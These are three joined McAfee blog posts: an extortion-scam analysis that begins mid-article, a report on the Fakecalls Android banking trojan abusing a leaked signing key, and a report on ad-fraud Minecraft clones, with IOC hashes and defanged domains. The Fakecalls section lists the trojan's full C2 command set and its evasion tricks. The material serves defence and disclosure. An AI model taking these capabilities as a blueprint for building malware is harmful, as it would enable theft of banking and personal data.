Figure 2 is an illustration of a typical extortion email that scammers use to exploit their victims. In this instance, the scammer is claiming to have gained unauthorized access to the victim’s account through a security vulnerability in a Cisco router. The scammer is then threatening to expose embarrassing information about the victim unless a payment of $1,340 is made. 

The payment is demanded through a Bitcoin wallet address that the scammer has provided. In this example, the scammer has obfuscated the Bitcoin wallet address by adding spaces between the characters, which is a tactic used to make it harder to track the payment. Now, let us examine another instance of extortion emails. 

Figure 3 – Extortion fraud example 2 

 

Figure 3 is another example of an extortion email that scammers use to trick and manipulate their victims. In this case, the attacker is claiming to have gained unauthorized access to the victim’s accounts and has deployed trojans and viruses on the victim’s system. The scammer is also blackmailing the victim by alleging that they have explicit adult content about the victim and the victim’s web browsing history. The purpose of this is to instill fear and provoke a sense of urgency in the victim. 

Like the previous example, the scammer has provided a Bitcoin wallet address for the victim to make a ransom payment of $950. Additionally, the attacker has explained that the virus they’ve deployed is undetectable by antivirus software because they’ve used drivers that update the virus every few hours. 

Use of Cryptocurrency 

Cryptocurrency tools are the most common way these scammers ask for a ransom. They use this tactic because it is difficult to trace and can be sent quickly and anonymously to other platforms. We noticed that scammers were demanding ransom payments through Bitcoin wallets. So, we tried to gather statistics on the number of unique Bitcoin wallets we came across in the past month. 

Figure 4 – Unique Bitcoin Stats for 20th February 2023 – 23rd March 2023 

We checked these Bitcoin addresses to see what their transactions activities are and their reputation on the blockchain and Bitcoin abuse database. Below are some snapshots of the transaction of these addresses. 

 

Figure 5 – Bitcoin received, and abuse report count for Bitcoin address 

As illustrated in Figure 5, it is clear that the Bitcoin addresses mentioned in these extortion emails have numerous abuse reports against them. Additionally, some ransom payments have been received through these addresses. Our intelligence also collected weekly trends on how much money they had within them.

Figure 6 – Total Amount received (US Dollars) in that week  

Figure 6 shows that the amount of money received in these Bitcoin addresses is increasing weekly. This implies that scammers are successfully extorting money from more consumers. 

How to avoid these frauds? 

If you receive extortion emails, follow the steps outlined below. 

• Don’t make any decisions quickly and don’t panic. If you panic that will be a win for these scammers. 
• Mostly the stuff they scare you about in the mail is always false. As soon as you receive such think twice before sending payment emails, to block them and delete them. 
• Try to search important keywords on your search engines, for example, if scammers are claiming to exploit Cisco router vulnerabilities search that vulnerability with keywords like ‘BTC’, ‘hack’, and some other keywords from the email, and you will find many results which will help you to understand that the scammer’s claims are only false. 
• Try to discover more about the email you got, you can search for the sender’s address, the subject of the mail, or even certain paragraphs from the mail on the internet. You will surely get information on how these emails are only scareware.
• Keep yourself educated on such scams so that you can protect yourself.
• Keep your antivirus updated and do timely full scans of your machines.
• Don’t surf on questionable web pages or download illegal/cracked software. 

Despite advancements in technology, extortion frauds continue to increase as seen in this blog. However, the best defense against such scams is to remain calm, and informed, and to make others aware of such frauds. By following the steps mentioned above, such as not responding to or paying any ransom demands, keeping your system and software updated, using strong passwords, and being wary of unusual emails or links, you can protect yourself from falling victim to these frauds. It is important to stay vigilant and to report any questionable activity to the appropriate authorities. By taking these precautions, you can help prevent yourself and others from becoming victims of extortion fraud. 

The post Extortion Fraud is Still on the Rise appeared first on McAfee Blog.

Authored by Dexter Shin 

McAfee Mobile Research Team found an Android banking trojan signed with a key used by legitimate apps in South Korea last year. By design, Android requires that all applications must be signed with a key, in other words a keystore, so they can be installed or updated. Because this key can only be used by the developer who created it, an application signed with the same key is assumed to belong to the same developer. That is the case of this Android banking trojan that uses this legitimate signing key to bypass signature-based detection techniques. And these banking trojans weren’t distributed on Google Play or official app stores until now. This threat had been disclosed to the company that owns the legitimate key last year and the company has taken precautions. The company has confirmed that they have replaced the signing key and currently, all their legitimate apps are signed with a new signing key. 

Android malware using a legitimate signing key 

While tracking the Android banking trojan Fakecalls we found a sample using the same signing key as a well–known app in Korea. This app is developed by a reputable IT services company with extensive businesses across various sectors, including but not limited to IT, gaming, payment, and advertising. We confirmed that most of the malicious samples using this key pretend to be a banking app as they use the same icon as the real banking apps. 

Figure 1. Malware and legitimate app on Google Play 

Distribution method and latest status 

Domains verified last August when we first discovered the samples are now down. However, we investigated URLs related to this malware and we found similar ones related to this threat. Among them, we identified a phishing site that is still alive during our research. The site is also disguised as a banking site. 

Figure 2. A phishing page disguised as a Korean banking site 

We also found that they updated the domain information of this web page a few days before our investigation. 

So we took a deeper look into this domain and we found additional unusual IP addresses that led us to the Command and control(C2) server admin pages used by the cybercriminals to control the infected devices. 

 

Figure 3. Fakecalls Command and control(C2) admin pages 

How does it work 

When we check the APK file structure, we can see that this malware uses a packer to avoid analysis and detection. The malicious code is encrypted in one of the files below. 

Figure 4. Tencent’s Legu Packer libraries 

After decrypting the DEX file, we found some unusual functionality. The code below gets the Android package information from a file with a HTML extension. 

 Figure 5. Questionable code in the decrypted DEX file 

This file is in fact another APK (Android Application) rather than a traditional HTML file designed to be displayed in a web browser. 

Figure 6. APK file disguised as an HTML file 

When the user launches the malware, it immediately asks for permission to install another app. Then it tries to install an application stored in the “assets” directory as “introduction.html”. The “introduction.html” is an APK file and real malicious behavior happens here. 

Figure 7. Dropper asks you to install the main payload 

When the dropped payload is about to be installed, it asks for several permissions to access sensitive personal information. 

Figure 8. Permissions required by the main malicious application 

It also registers several services and receivers to control notifications from the device and to receive commands from a remote Command and Control server. 

 Figure 9. Services and receivers registered by the main payload

By contrast, the malware uses a legitimate push SDK to receive commands from a remote server. Here are the complete list of commands and their purpose. 

 

Command name	Purpose
note	sms message upload
incoming_transfer	caller number upload
del_phone_record	delete call log
zhuanyi	set call forwarding with parameter
clear_note	delete sms message
assign_zhuanyi	set call forwarding
file	file upload
lanjie	block sms message from specified numbers
allfiles	find all possible files and upload them
email_send	send email
record_telephone	call recording on
inout	re-mapping on C2 server
blacklist	register as blacklist
listener_num	no function
no_listener_num	disable monitoring a specific number
rebuild	reset and reconnect with C2
deleteFile	delete file
num_address_list	contacts upload
addContact	add contacts
all_address_list	call record upload
deleteContact	delete contacts
note_intercept	intercept sms message from specified numbers
intercept_all_phone	intercept sms message from all
clear_date	delete all file
clear_phone_contact	delete all contacts
clear_phone_record	delete all call log
per_note	quick sms message upload
soft_name	app name upload

 

Cybercriminals are constantly evolving and using new ways to bypass security checks, such as abusing legitimate signing keys. Fortunately, there was no damage to users due to this signing key leak. However, we recommend that users install security software on their devices to respond to these threats. Also, users are recommended to download and use apps from the official app stores. 

McAfee Mobile Security detects this threat as Android/Banker regardless of the application, is signed with the previously legitimate signing key. 

 

Indicators of Compromise 

 

SHA256	Name	Type
7f4670ae852ec26f890129a4a3d3e95c079f2f289e16f1aa089c86ea7077b3d8	신한신청서	Dropper
9e7c9b04afe839d1b7d7959ad0092524fd4c6b67d1b6e5c2cb07bb67b8465eda	신한신청서	Dropper
21ec124012faad074ee1881236c6cde7691e3932276af9d59259df707c68f9dc	신한신청서	Dropper
9621d951c8115e1cc4cf7bd1838b8e659c7dea5d338a80e29ca52a8a58812579	신한신청서	Dropper
60f5deb79791d2e8c2799e9af52adca5df66d1304310d1f185cec9163deb37a2	보안인증서	Banker
756cffef2dc660a241ed0f52c07134b7ea7419402a89d700dffee4cc6e9d5bb6	보안인증서	Banker
6634fdaa22db46a6f231c827106485b8572d066498fc0c39bf8e9beb22c028f6	보안인증서	Banker
52021a13e2cd7bead4f338c8342cc933010478a18dfa4275bf999d2bc777dc6b	보안인증서	Banker
125772aac026d7783b50a2a7e17e65b9256db5c8585324d34b2e066b13fc9e12	보안인증서	Banker
a320c0815e09138541e9a03c030f30214c4ebaa9106b25d3a20177b5c0ef38b3	보안인증서	Banker
c7f32890d6d8c3402601743655f4ac2f7390351046f6d454387c874f5c6fe31f	보안인증서	Banker
dbc7a29f6e1e91780916be66c5bdaa609371b026d2a8f9a640563b4a47ceaf92	보안인증서	Banker
e6c74ef62c0e267d1990d8b4d0a620a7d090bfb38545cc966b5ef5fc8731bc24	보안인증서	Banker

 

Domains: 

• http[://]o20-app.dark-app.net 
• http[://]o20.orange-app.today 
• http[://]orange20.orange-app.today 

The post Fakecalls Android Malware Abuses Legitimate Signing Key appeared first on McAfee Blog.

Authored by Dexter Shin 

Minecraft is a popular video game that can be played on a desktop or mobile. This is a sandbox game developed by Mojang Studios. Players create and break apart various kinds of blocks in 3-dimensional worlds and they can select to enjoy Survivor Mode to survive in the wild or Creative Mode to focus on being creative. 

Minecraft’s popularity has led to many attempts to recreate similar games. As a result, there are so many games with the same concept as Minecraft worldwide. Even on Google Play, we can easily search for similar games. McAfee Mobile Research Team recently discovered 38 games with hidden advertising. These HiddenAds applications discovered on the Google Play Store and installed by at least 35 million users worldwide, have been found to send packets stealthily for advertising revenue in bulk.  

McAfee, a member of the App Defense Alliance, focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. reported the discovered apps to Google, which took prompt action and the apps are no longer available on Google Play. Android users are protected by Google Play Protect, which can warn users of identified malicious apps on Android devices, and McAfee Mobile Security detects this threat as Android/HiddenAds.BJL. For more information, and to get fully protected, visit McAfee Mobile Security. 

How is it distributed to users? 

They were officially uploaded to Google Play under various titles and package names. Many games have already been downloaded by users, including apps with 10M+ downloads. 

Figure 1. 10M+ downloaded app being one of them 

Also, because they can play the game, users can’t notice the large amount of advertising packets being generated on their devices. 

Figure 2. Game screen that can be played 

What does it do?

After the game is running, the user can play without any problems in the block-based world, only like Minecraft-type games. However, advertisement packets of various domains continuously occur on the device. For example, the four packets shown in the picture are questionable packets generated by the ads libraries of Unity, Supersonic, Google, and AppLovin. Unfortunately, nothing is displayed on the game screen. 

Figure 3. Continuous advertising packets 

What’s even more interesting is the initial network packets of these games. The structure of the initial packet is very similar. All domains are different. But using 3.txt as the path is equivalent. That is, packets in the form of https://(random).netlify.app/3.txt commonly occur first. The picture below is an example of the first packet extracted from three different apps. 

Figure 4. Similarity of the initial packet form 

Users affected worldwide 

This threat has been detected in various countries around the world. Indicated by our telemetry, the threat has been most prominently detected in the United States, Canada, South Korea, and Brazil.

 

Figure 5. Users around the world who are widely affected 

 

As we featured in the McAfee 2023 Consumer Mobile Threat Report, one of the most accessible content for young people using mobile devices is games. Malware authors are also aware of this and try to hide their malicious features inside games. Not only is it difficult for general users to find these hidden features, but they can easily trust games from official stores such as Google Play. 

 

We first recommend that users thoroughly review user reviews before downloading applications from the store. And users should install security software on their devices and always keep up to date. 

 

Indicators of Compromise 

 

Package Name	Application Name	SHA256	GooglePlay  Downloads
com.good.robo.game.builder.craft.block	Block Box Master Diamond	300343e701afddbf32bca62916fd717f2af6e8a98fd78cc50d11f1154971d857	10M+
com.craft.world.fairy.fun.everyday.block	Craft Sword Mini Fun	72fa914ad3460f9e696ca2264fc899cad20b06b640a7adf8cfe87dd0ea19e137	5M+
com.skyland.pet.realm.block.rain.craft	Block Box Skyland Sword	d15713467be2f60b2bc548ddb24f202eb64f2aed3fb8801daec14e708f5cee5b	5M+
com.skyland.fun.block.game.monster.craft	Craft Monster Crazy Sword	cadbc904e77feaaf4294d218808f43d50809a87202292e78b0e6a3e164de6851	5M+
com.monster.craft.block.fun.robo.fairy	Block Pro Forrest Diamond	08429992bef8259e3011af36ad9d3c2a61b8df384860fd2a007a32a1e4d634af	1M+
com.cliffs.realm.block.craft.rain.vip	Block Game Skyland Forrest	34ef407f2bedfd8485f6a178f14ee023d395cb9b76ff1754e8733c1fc9ce01fb	1M+
com.block.builder.build.clever.craft.boy	Block Rainbow Sword Dragon	23aa3cc9481591b524a442fa8df485226e21da9d960dc5792af4ae2a096593d5	1M+
com.fun.skyland.craft.block.monster.loki	Craft Rainbow Mini Builder	88fa7de264c5880e65b926df4f75ac6a2900e3718d9d3576207614e20f674068	1M+
com.skyland.craft.caves.game.monster.block	Block Forrest Tree Crazy	010c081e5fda58d6508980528efb4f75e572d564ca9b5273db58193c59987abf	1M+
com.box.block.craft.builder.cliffs.build	Craft Clever Monster Castle	11c5e2124e47380d5a4033c08b2a137612a838bc46f720fba2a8fe75d0cf4224	500K+
com.block.sun.game.box.build.craft	Block Monster Diamond Dragon	19ad0dc40772d29f7f39b3a185abe50d0917cacf5f7bdc577839b541f61f7ac0	500K+
com.builder.craft.diamond.block.clever.robo	Craft World Fun Robo	746e2f552fda2e2e9966fecf6735ebd5a104296cde7208754e9b80236d13e853	500K+
com.block.master.boy.craft.cliffs.diamond	Block Pixelart Tree Pro	25b22e14f0bb79fc6b9994faec984501d0a2bf5573835d411eb8a721a8c2e397	500K+
com.fun.block.everyday.boy.robo.craft	Craft Mini Lucky Fun	9fdddf4a77909fd1d302c8f39912a41483634db66d30f89f75b19739eb8471ff	500K+
com.builder.craft.block.sun.game.mini	Block Earth Skyland World	b9284db049c0b641a6b760e7716eb3561e1b6b1f11df8048e9736eb286c2beed	500K+
com.dragon.craft.world.pixelart.block.vip	Block Rainbow Monster Castle	d6984e08465f08e9e39a0cad8da4c1e405b3aa414608a6d0eaa5409e7ed8eac1	500K+
com.craft.vip.earth.everyday.block.game	Block Fun Rainbow Builder	f3077681623d9ce32dc6a9cbf5d6ab7041297bf2a07c02ee327c730e41927c5f	500K+
com.block.good.mini.craft.box.best	Craft Dragon Diamond Robo	e685fb5a426fe587c3302bbd249f8aa9e152c1de9b170133dfb492ed5552acc9	500K+
com.lucky.robo.craft.loki.block.good	Block World Tree Monster	06c3ba10604c38006fd34406edd47373074d57c237c880a19fb8d3f34572417d	100K+
com.caves.robo.craft.dragon.block.earth	Block Diamond Boy Pro	122406962c303eaeb9839d767835a82ae9d745988deeef4c554e1750a5106cf0	100K+
com.tree.world.city.block.craft.crazy	Block Lucky Master Earth	e69fe06cb77626be76f2c92ad4229f6eb04c06c73e153d5424386a1309adbd15	100K+
com.game.skyland.craft.monster.block.best	Craft Forrest Mini Fun	e5fc2e6e3749cb4787a8bc5387ebb7802a2d3f9b408e4d2d07ee800056bb3e16	100K+
com.everyday.vip.caves.house.block.craft	Craft Sword City Pro	318165fd8d77a63ca221f5d3ee163e6f2d6df1f2df5c169aca6aca23aef2cf25	100K+
com.cell.rain.block.craft.loki.fairy	Block Loki Monster Builder	4f22be2ce64376f046ca180bd9933edcd62fd36f4a7abc39edf194f7170e2534	100K+
com.block.good.sun.boy.craft.fun	Block Boy Earth Mini	3b0cf56fb5929d23415259b718af15118c44cf918324cc62c1134bf9bc0f2a00	100K+
com.fairy.builder.sun.skyland.craft.block	Block Crazy Builder City	537638903f31e32612bddc79a483cb2c7546966cca64c5becec91d6fc4835e22	100K+
com.monster.house.good.block.earth.craft	Craft Sword Vip Pixelart	5f85f020eb8afc768e56167a6d1b75b6d416ecb1ec335d4c1edb6de8f93a3cad	100K+
com.block.best.boy.craft.sword.cell	Block City Fun Diamond	698544a913cfa5df0b2bb5d818cc0394c653c9884502a84b9dec979f8850b1e7	100K+
com.crazy.clever.city.block.caves.craft	Craft City Loki Rainbow	ba50dc2d2aeef9220ab5ff8699827bf68bc06caeef1d24cb8d02d00025fcb41c	100K+
com.cliffs.builder.craft.block.lucky.earth	Craft Boy Clever Sun	77962047b32a44c472b89d9641d7783a3e72c156b60eaaec74df725ffdc4671b	100K+
com.lucky.best.block.game.diamond.craft	Block City Dragon Sun	ac3d0b79903b1e63b449b64276075b337b002bb9a9a9636a47fdd1fb7a0fe368	100K+
com.build.craft.boy.loki.master.block	Craft Loki Forrest Monster	a2db1eba73d911142134ee127897d5857c521135a8ee768ae172ae2d2ee7b1d4	100K+
com.build.lokicrafts.master.forest	Lokicraft: Forrest Survival 3D	0f53996f5e3ec593ed09e55baf1f93d32d891f7d7e58a9bf19594b235d3a8a84	50K+
com.sun.realm.craft.lucky.dragon.block	Craft Castle Sun Rain	1e74e73bc29ce1f55740e52250506447b431eb8a4c20dfc75fd118b05ca18674	50K+
com.block.craft.vip.sun.game.box	Craft Game Earth World	7483b6a493c0f4f6309e21cc553f112da191b882f96a87bce8d0f54328ac7525	50K+
com.rain.crazy.lucky.pro.block.craft	Craft Lucky Castle Builder	de5eb8284ed56e91e665d13be459b9a0708fa96549a57e81aa7c11388ebfa535	50K+
com.JavaKidz.attacksnake	Craftsman: Building City 2022	e19fcc55ec4729d52dc0f732da02dc5830a2f78ec2b1f37969ee3c7fe16ddb37	50K+
com.skyland.house.block.craft.crazy.vip	Craft Rainbow Pro Rain	a7675a08a0b960f042a02710def8dd445d9109ca9da795aed8e69a79e014b46f	50K+

 

The post HiddenAds Spread via Android Gaming Apps on Google Play appeared first on McAfee Blog.